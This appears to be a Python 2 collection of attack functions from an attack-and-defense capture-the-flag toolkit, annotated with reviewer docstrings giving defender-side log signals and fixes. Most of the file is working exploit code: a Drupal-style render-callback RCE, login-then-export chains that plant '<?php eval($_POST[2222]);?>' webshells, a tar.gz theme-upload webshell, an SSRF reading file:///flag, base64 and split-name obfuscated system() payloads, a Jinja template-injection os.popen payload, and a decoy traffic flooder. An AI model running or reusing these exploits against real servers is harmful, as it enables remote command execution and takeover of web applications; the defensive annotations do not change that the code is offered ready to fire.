def vulnerable_attack(target, target_port, cmd):
    """POST ``cmd`` to the registration AJAX endpoint as a render-callback argument.

    The form body sets ``mail[0][#lazy_builder][0]`` to ``system`` and places
    the URL-quoted ``cmd`` in ``mail[0][#lazy_builder][1][0]``.  The request
    therefore only has an effect on a server that accepts ``#``-prefixed
    render properties from request input.  The parameter names look like
    Drupal's Form API -- TODO confirm the target application.

    Defender view: in access logs this is a POST to ``/user/register`` with
    ``element_parents`` and ``ajax_form=1`` in the query string and
    ``#``-prefixed keys in the body.  Stripping ``#``-prefixed keys from
    request input, together with the vendor fix, removes the injection point.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    endpoint = "/user/register?element_parents=account/mail/%23value&ajax_form=1"
    form_template = 'form_id=user_register_form&mail[0][#lazy_builder][0]=system&mail[#type]=markup&mail[0][#lazy_builder][1][0]=%s'
    try:
        data = form_template % quote(cmd)
        res = http("post", target, target_port, endpoint, data, headers)
    except Exception:
        # Any failure (quoting or transport) is logged and mapped to a sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def shit(target, target_port, cmd):
    """Run a fixed login / profile-edit / export request sequence, then POST ``cmd``.

    Steps, in the order the code performs them:
      1. GET the login page and cut a CSRF token out of the HTML by offset.
      2. Log in (the credentials are masked as ``******`` in this listing).
      3. Store a one-line PHP snippet in the ``profile[truename]`` field.
      4. Log out, request the ``register/submited`` URL, then request the
         course-export URL with ``fileName`` set to an absolute ``.php`` path
         under ``/var/www/html/web/files/``.
      5. POST ``system('<cmd>');`` in field ``2222`` to that file name.

    Returns whatever ``http`` returns for the final request.

    Defender view: the sequence assumes that the export handler honours a
    caller-supplied absolute ``fileName`` with a ``.php`` extension, that
    profile text reaches the exported file unescaped, and that the files
    directory executes PHP.  Server-chosen export names with a fixed
    extension, and no script execution in upload/export directories, each
    break the chain.  In logs, look for export requests carrying a
    ``fileName`` parameter that ends in ``.php``.
    """
    s = requests.Session()
    ip = target
    # File name is the MD5 hex digest of the current timestamp string.
    shellhash = hashlib.md5(str(time.time())).hexdigest()
    url = 'http://%s:%s/web/login' % (ip, str(target_port))
    url_2 = 'http://%s:%s/web/login_check' % (ip, str(target_port))
    url_3 = 'http://%s:%s/web/' % (ip, str(target_port))
    url_4 = 'http://%s:%s/web/settings/' % (ip, str(target_port))
    url_5 = 'http://%s:%s/web/logout' % (ip, str(target_port))
    # Export endpoint; the fileName query parameter names the output path.
    url_6 = 'http://%s:%s/web/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (
        ip, str(target_port), shellhash)
    # Fixed registration URL with a hard-coded token segment.
    url_7 = 'http://%s:%s/web/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % (
        ip, str(target_port))
    # The string below is an unused expression: the same URLs without the
    # "/web" prefix, kept by the author as an alternative layout.
    ''' url = 'http://%s:%s/login' % (ip,str(target_port)) url_2 = 'http://%s:%s/login_check' %(ip,str(target_port)) url_3 = 'http://%s:%s/' %(ip,str(target_port)) url_4 = 'http://%s:%s/settings/' % (ip,str(target_port)) url_5 = 'http://%s:%s/logout' % (ip,str(target_port)) url_6 = 'http://%s:%s/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (ip,str(target_port),shellhash) url_7 = 'http://%s:%s/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % (ip,str(target_port)) '''
    # Log in as a regular user.
    content = s.get(url).content
    # Token is sliced out by fixed offsets between two markers.
    # NOTE(review): if either marker is missing, find() returns -1 and the
    # slice silently yields a wrong token.
    index_1 = content.find('<meta name="description"')
    index_2 = content.find('name="csrf-token"/>')
    token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
    debug_print(token)
    s.post(url_2,
           data={
               '_username': '******',
               '_password': '******',
               '_csrf_token': '%s' % token
           })
    s.get(url_3)
    # Write the PHP snippet into the profile's "truename" field.
    shell = '<?php eval($_POST[2222]);?>'
    s.post(url_4,
           data={
               'profile[truename]': '%s' % shell,
               '_csrf_token': '%s' % token
           })
    s.get(url_5)
    # The author labels this step "admin login"; what the URL grants is not
    # visible here -- TODO confirm.
    s.get(url_7)
    # Trigger the export without following redirects.
    s.get(url_6, allow_redirects=False)
    payload = "system('%s');" % cmd
    data = '2222=%s' % quote(payload)
    res = http("post", target, target_port, "/web/files/%s.php" % shellhash,
               data, headers)
    print res
    return res
def send(hosts, msgs):
    """Loop forever, sending one randomly chosen templated request to every host.

    ``hosts`` entries are ``"ip:port"`` strings whose last character is
    dropped before splitting (presumably a trailing newline -- confirm).
    ``msgs`` entries are ``method*---craso---*path*---craso---*template``
    records; the template is filled with ``quote(trash())`` and
    ``para_key()``.

    Each pass picks a random User-Agent from ``./data/ua.data`` and a random
    ``Accept-Language`` from ``ac_lang``, and writes them into the
    module-level ``headers`` dict, so the change is visible to every other
    user of that dict.

    Defender view: because User-Agent and Accept-Language vary per pass,
    filtering on a single header value will not isolate this traffic.  The
    non-standard ``Hacked by: Redbud`` header is present on roughly one pass
    in seven (``randint(0, 6) == 0``).

    NOTE(review): the original indentation was lost in this listing; the
    nesting below is reconstructed and should be checked against the source
    file.
    """
    while True:
        # Re-read the User-Agent list on every pass and pick one line.
        tmp_file = open("./data/ua.data", "rb")
        rd = tmp_file.readlines()
        headers['User-Agent'] = rd[random.randint(0, len(rd) - 1)].strip()
        tmp_file.close()
        rnds = random.randint(0, 6)
        # Clear the marker header from the previous pass, then set it again
        # only when the draw is 0.
        if headers.has_key('Hacked by'):
            headers.pop('Hacked by')
        if rnds == 0:
            headers['Hacked by'] = "Redbud"
        headers['Accept-Language'] = ac_lang[random.randint(
            0,
            len(ac_lang) - 1)]
        contents = msgs[random.randint(0, len(msgs) - 1)].strip()
        if not contents:
            continue
        contents = contents.split("*---craso---*")
        # NOTE(review): the guard accepts two fields, but contents[2] is read
        # below; a two-field record raises IndexError, which the except
        # clause prints once per host.
        if len(contents) < 2:
            continue
        for host in hosts:
            ip, port = host[:-1].split(":")
            try:
                print contents[0] + " " + ip + ":" + port + contents[
                    1] + "?" + contents[2].format(crasolee_para=quote(trash()),
                                                  crasolee_para0=para_key())
                # GET puts the filled template in the query string; any other
                # method sends it as the request body.
                if contents[0] == 'get' or contents[0] == 'GET':
                    tmp = http(
                        contents[0], ip, int(port), contents[1] + "?" +
                        contents[2].format(crasolee_para=quote(trash()),
                                           crasolee_para0=para_key()), '',
                        headers)
                else:
                    tmp = http(
                        contents[0], ip, int(port), contents[1],
                        contents[2].format(crasolee_para=quote(trash()),
                                           crasolee_para0=para_key()), headers)
            except Exception, e:
                print e
        # NOTE(review): the position of this sleep (per pass vs. per host vs.
        # inside the except) cannot be recovered from the listing.
        time.sleep(1)
def shit(target, target_port, cmd):
    """Run a login / profile-edit / export request sequence, then POST ``cmd``.

    Steps, in the order the code performs them:
      1. GET the login page, cut the CSRF token out of the HTML, log in
         (credentials are masked as ``******`` in this listing).
      2. Store a one-line PHP snippet in the ``profile[job]`` field, log out.
      3. Fetch a new token and log in again (the masked credentials make it
         impossible to tell whether this is a different account).
      4. Request the student-export URL with ``fileName`` set to an absolute
         ``.php`` path under ``/var/www/html/web/files/tmp/``.
      5. POST ``system('<cmd>');`` in field ``2222`` to ``/files/tmp/<name>.php``.

    Returns whatever ``http`` returns for the final request.

    Defender view: the sequence assumes an export handler that writes to a
    caller-supplied absolute ``fileName`` ending in ``.php``, inside a
    directory served with PHP execution.  Server-generated export names, a
    fixed extension, and no script execution under ``files/`` each stop it.
    Export requests whose ``fileName`` ends in ``.php`` are the log signal.
    """
    s = requests.Session()
    ip = target
    # File name is the MD5 hex digest of the current timestamp string.
    shellhash = hashlib.md5(str(time.time())).hexdigest()
    url = 'http://%s:%s/app.php/login' % (ip, str(target_port))
    url_2 = 'http://%s:%s/app.php/login_check' % (ip, str(target_port))
    url_3 = 'http://%s:%s/app.php/' % (ip, str(target_port))
    url_4 = 'http://%s:%s/app.php/settings/' % (ip, str(target_port))
    url_5 = 'http://%s:%s/app.php/logout' % (ip, str(target_port))
    # Export endpoint; the fileName query parameter names the output path.
    url_6 = 'http://%s:%s/app.php/course_set/1/manage/course/1/manage/student/export/datas?fileName=/var/www/html/web/files/tmp/%s.php' % (
        ip, str(target_port), shellhash)
    # First login: token is sliced out by fixed offsets between two markers.
    # NOTE(review): a missing marker makes find() return -1 and the slice
    # silently yields a wrong token.
    content = s.get(url).content
    index_1 = content.find('<meta name="description"')
    index_2 = content.find('name="csrf-token"/>')
    token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
    debug_print(token)
    s.post(url_2,
           data={
               '_username': '******',
               '_password': '******',
               '_csrf_token': '%s' % token
           })
    s.get(url_3)
    # Write the PHP snippet into the profile's "job" field.
    shell = '<?php eval($_POST[2222]);?>'
    s.post(url_4,
           data={
               'profile[job]': '%s' % shell,
               '_csrf_token': '%s' % token
           })
    s.get(url_5)
    # Second login, same token-scraping steps as above.
    content = s.get(url).content
    index_1 = content.find('<meta name="description"')
    index_2 = content.find('name="csrf-token"/>')
    token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
    debug_print(token)
    s.post(url_2,
           data={
               '_username': '******',
               '_password': '******',
               '_csrf_token': '%s' % token
           })
    # Trigger the export.
    s.get(url_6)
    payload = "system('%s');" % cmd
    data = '2222=%s' % quote(payload)
    res = http("post", target, target_port, "/files/tmp/%s.php" % shellhash,
               data, headers)
    print res
    return res
def waf_check(target, target_port):
    """Return True when a plain POST and a payload-bearing POST get the same body.

    The first request goes to ``url_label`` through ``requests`` with an
    ``Accept-Encoding`` value of ``aasas`` (presumably to avoid a compressed
    body -- confirm).  The second goes to the same path through ``http`` with
    ``get_payload`` in the query string and ``post_payload`` as the body, and
    is decoded as UTF-8.  A status tag is printed without a trailing newline.

    The check compares response text only; it does not look at status codes
    or headers.  ``url_label``, ``get_payload``, ``post_payload`` and
    ``timeout`` are defined elsewhere in the file.
    """
    port = int(target_port)
    baseline = requests.post('http://%s:%d%s' % (target, port, url_label),
                             timeout=timeout,
                             headers={"Accept-Encoding": "aasas"}).text
    probed = http('post', target, port, url_label + '?' + get_payload,
                  post_payload, {}).decode('utf-8')
    if baseline != probed:
        print '|url_fail|',
        return False
    print '|url__ok_|',
    return True
def vulnerable_attack(target, target_port, cmd):
    """Upload a tar.gz through ``/admin.php?action=themeinstall``, then POST ``cmd``.

    Steps, in the order the code performs them:
      1. Log in at ``/login.php`` with the fixed form body
         ``cont1=123456789`` (a hard-coded password value).
      2. Write a one-line PHP file to ``/tmp`` and pack it with ``tar``.
      3. Upload the archive as ``sendfile`` to the theme-install action.
      4. Delete both local files.
      5. POST the URL-quoted ``cmd`` to ``/data/themes/<name>.php`` in a
         parameter named after the random string.

    Defender view: the sequence assumes that the admin password is the value
    above, that the theme installer unpacks arbitrary archive members, and
    that ``/data/themes/`` executes PHP.  Changing the default password,
    validating archive contents against an allow-list of theme file types,
    and disabling script execution in the themes directory each stop it.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    try:
        s = requests.session()
        url_1 = "http://%s:%d/login.php" % (target, int(target_port))
        url_2 = "http://%s:%d/admin.php?action=themeinstall" % (
            target, int(target_port))
        # random_string() is defined elsewhere; its alphabet is not visible
        # here, and its value is interpolated into shell commands below.
        my_hash = random_string()
        s.post(url_1,
               data="cont1=123456789&bogus=&submit=Log+in",
               headers={
                   "Accept-Encoding": "identity",
                   "Content-Type": "application/x-www-form-urlencoded"
               })
        shell_content = "<?php system($_REQUEST['%s']);?>" % my_hash
        file_name = my_hash + ".php"
        tar_name = my_hash + ".tar.gz"
        # NOTE(review): the file object is never closed explicitly; the write
        # is only flushed when the object is garbage-collected.
        open('/tmp/%s' % file_name, 'w').write(shell_content)
        res = os.popen('cd /tmp;tar cvfz %s %s' %
                       (tar_name, file_name)).read()
        debug_print(res)
        data = {"submit": "Upload"}
        # NOTE(review): this handle is also left open.
        files = {"sendfile": open("/tmp/" + tar_name, 'rb')}
        s.post(url_2,
               data=data,
               files=files,
               headers={"Accept-Encoding": "identity"})
        # Local clean-up; if an earlier step raises, these files stay in /tmp.
        res = os.popen('rm /tmp/%s /tmp/%s' % (file_name, tar_name)).read()
        debug_print(res)
        data = '%s=%s' % (my_hash, quote(cmd))
        res = http("post",
                   target,
                   target_port,
                   "/data/themes/%s" % (file_name),
                   data,
                   headers=headers)
    except Exception, e:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """GET ``/link?url=file:///flag`` and wrap the response in the command markers.

    ``cmd`` is not used.  The request only returns file contents if the
    ``/link`` handler fetches whatever URL it is given, including the
    ``file://`` scheme.  The response is converted with ``str`` and placed
    between ``cmd_prefix`` and ``cmd_postfix`` (both defined elsewhere).

    Defender view: the fix is for the handler to accept only ``http``/``https``
    URLs and to resolve and validate the destination before fetching.
    Requests to ``/link`` whose ``url`` parameter starts with ``file:`` are
    the log signal.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    request_path = "/link?url=file:///flag"
    try:
        body = http("get", target, target_port, request_path, "", headers)
        res = cmd_prefix + str(body) + cmd_postfix
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """POST base64-wrapped ``cmd`` in form field ``222`` to ``/index.php``.

    The field carries PHP source that decodes the base64 string and passes it
    to a function whose name is assembled from two string pieces.  It only
    has an effect if ``/index.php`` evaluates that field, i.e. the
    ``eval($_POST[222]);`` backdoor this block was written for.

    Defender view: because the function name is split and the command is
    base64-encoded, request filters that match literal keywords will not see
    either.  The dependable fix is removing the ``eval`` of request data from
    the script.  POST bodies to ``/index.php`` with a purely numeric
    parameter name are the log signal.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    php_template = "$a='sy'.'stem';$b = '%s';$a(base64_decode($b));"
    try:
        encoded = base64.b64encode(cmd)
        form_body = '222=%s' % quote(php_template % encoded)
        res = http("post", target, target_port, "/index.php", form_body,
                   headers)
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """POST a PHP document as the raw request body to ``/index.php?f=a``.

    ``cmd`` is URL-unquoted, base64-encoded and embedded in a PHP snippet that
    is sent as the body itself (not as a form field).  That only has an
    effect if the script includes ``php://input``, which is the flaw this
    block was written for.

    Defender view: the fix is for the script never to pass request-derived
    values to ``include``; setting ``allow_url_include=Off`` additionally
    blocks the ``php://input`` wrapper in include statements.  POST bodies to
    ``/index.php`` that begin with ``<?php`` are the log signal.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    body_template = "<?php $a='sy'.'stem';$b = '%s';$a(base64_decode($b));?>"
    try:
        encoded = base64.b64encode(urllib.unquote(cmd))
        data = body_template % encoded
        res = http("post", target, target_port, "/index.php?f=a", data,
                   headers)
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """Request a path containing a template expression and cut the echoed result.

    The request path is a ``{{ ... }}`` expression that embeds ``cmd``.  The
    code then takes the text between ``<h1>URL `` and
    `` not found</h1><br/>`` in the response, so it expects the not-found
    page to echo the requested path after template evaluation.

    Defender view: the flaw is an error page that builds template *source*
    from the request path.  Passing the path to a fixed template as a
    variable (with auto-escaping on) removes it.  Request paths containing
    ``{{`` or ``__class__`` are the log signal.

    NOTE(review): ``cmd`` is concatenated without quoting, and if either
    marker is missing ``find`` returns -1 and the slice is silently wrong.
    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    open_marker = "<h1>URL "
    close_marker = " not found</h1><br/>"
    try:
        payload = "/{{().__class__.__bases__.0.__subclasses__().59.__init__.__globals__.linecache.os.popen(\"" + cmd + "\").read()}}"
        page = http("get", target, target_port, payload, "", headers)
        begin = page.find(open_marker) + len(open_marker)
        finish = page.find(close_marker)
        res = page[begin:finish]
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """POST URL-quoted ``cmd`` in field ``haozigege`` to a JSP under the web app.

    The target path is ``/charpter2-1.0-SNAPSHOT/1.jsp``.  The request only
    has an effect if that JSP exists and executes the field's value, which
    means a command-running page is already present in the deployed
    application.

    Defender view: compare the deployed application directory against the
    build artifact; a ``1.jsp`` that is not part of the build is the thing to
    remove.  POSTs to that path are the log signal.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    jsp_path = "/charpter2-1.0-SNAPSHOT/1.jsp"
    try:
        form_body = 'haozigege=%s' % quote(cmd)
        res = http("post", target, target_port, jsp_path, form_body, headers)
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """POST base64-wrapped ``cmd`` in form field ``222`` to ``/1.php``.

    The field carries PHP source that uses ``call_user_func`` with function
    names assembled from string pieces to decode and run the base64 string.
    It only has an effect if ``/1.php`` evaluates that field (an
    ``eval``/``assert`` of request data).

    Defender view: the split names and base64 wrapping mean literal-keyword
    request filters will not match.  The dependable fix is removing the
    script that evaluates request data.  A ``1.php`` in the web root that is
    not part of the application is the artefact to look for.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    php_template = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"
    try:
        encoded = base64.b64encode(cmd)
        form_body = '222=%s' % quote(php_template % encoded)
        res = http("post", target, target_port, "/1.php", form_body, headers)
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """GET ``/index.php/index/index/`` with ``back1=system`` and ``back2=<cmd>``.

    ``cmd`` is URL-quoted into the ``back2`` query parameter.  The request
    only has an effect if the route calls the function named by ``back1``
    with ``back2`` as its argument -- presumably a callback-style backdoor in
    the controller; confirm against the application source.

    Defender view: the fix is never to dispatch to a function whose name
    comes from the request; use a fixed allow-list of handlers.  Query
    strings on that route containing ``back1=`` are the log signal.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    route_template = "/index.php/index/index/?back1=system&back2=%s"
    try:
        request_path = route_template % quote(cmd)
        res = http("get", target, target_port, request_path, "", headers)
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
def vulnerable_attack(target, target_port, cmd):
    """POST ``cmd=<flag_path>`` as body and Cookie to the ``login/backdoor`` route.

    The request goes to
    ``/index.php/admin/login/backdoor?hongkexueyuan=highlight_file`` with an
    ``X-Forwarded-For`` of ``8.8.8.8``.  ``cmd`` is base64-encoded but the
    result is not used; the value sent is ``flag_path`` (defined elsewhere).
    The ``Cookie`` and ``X-Forwarded-For`` entries are written into the
    module-level ``headers`` dict and stay there for later callers.

    Defender view: the route name and the ``highlight_file`` parameter
    indicate a handler that calls a request-named function on a
    request-supplied path.  Removing that handler is the fix.  If it gates on
    client address, note that ``X-Forwarded-For`` is client-controlled unless
    a trusted proxy overwrites it.

    NOTE(review): ``res`` is assigned but no ``return`` is visible in this
    listing, so as shown the caller receives ``None``.
    """
    route = "/index.php/admin/login/backdoor?hongkexueyuan=highlight_file"
    try:
        # Kept for its side effect of raising on a bad ``cmd``; the encoded
        # value itself is never sent.
        cmd = base64.b64encode(cmd)
        cookie_and_body = 'cmd=%s' % (flag_path)
        headers['Cookie'] = cookie_and_body
        headers['X-Forwarded-For'] = '8.8.8.8'
        res = http("post", target, target_port, route, cookie_and_body,
                   headers)
    except Exception:
        # Any failure is logged and mapped to the "error" sentinel.
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"